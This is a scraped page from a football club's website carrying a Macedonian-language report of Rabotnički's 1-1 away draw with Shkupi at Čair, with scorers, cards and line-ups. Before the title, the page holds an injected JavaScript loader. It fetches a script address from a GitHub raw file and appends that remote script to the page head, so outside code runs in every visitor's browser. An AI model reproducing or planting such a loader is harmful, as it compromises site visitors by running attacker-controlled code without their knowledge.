;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Реми (1-1) против Шкупи на Чаир
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Реми (1-1) против Шкупи на Чаир

Работнички одигра 1-1 на гостувањето против Шкупи на Чаир, во рамките на деветтото коло од Првата фудбалска лига. Петар Петковски во 63.минута донесе реми за тимот на Ѓоре Јовановски на овој меч.

Шкупи тргна офанзивно од самиот старт, се закани Рон Броја, а во деветтата минута тимот од Чаир дојде и во водство. Мухарем беше форсиран, Херера сакаше да ја отстрани опасноста, но го лобуваше Ристо Јанков и си постигна автогол.

Работнички се обиде да стигне до израмнување во финишот на првиот дел. Гофри шутираше во 37.минута, но Алексовски му го скрати аголот, а во 44.минута Тодоровски упати силен, но за малку непрецизен удар.

Во вториот дел, Работнички одигра многу подобро и тоа донесе ефект. Во 63.минута, Петар Петковски успеа да го израмни резултатот. По ова, имаше и уште една можност, но беше прецизен.

Баже Илијоски можеше да донесе ново водство за Шкупи, но тоа не го дозволи Ристо Јанков. На крајот и двете екипи се задоволија со по еден освоен бод.

ШКУПИ – РАБОТНИЧКИ 1-1 (1-0)

Стадион Чаир. Гледали: 500. Судија: Костантин Влахо (Скопје). Стрелец: Херера 9’ а.г. (Шкупи), П. Петковски 63’ (Работнички). Ж. картони: Занго (Шкупи), Димитровски, Херера (Работнички).

ШКУПИ: Алексовски, Ндонг, Типуриќ, Билали, Занго (54’ Бајрами), Љамчевски, Дакур (24’ Стојкоски), Броја, Серџо, Мухарем (72’ Илијоски), Ангелов.

РАБОТНИЧКИ: Јанков, Тодоровски, Димитровски, Митрев, Херера, Пеев (85’ Лазаров), Стјепановиќ, Бопесу, Недељковиќ (78’ Шаркоски), П. Петковски, Гофри (62’ Фазлиу).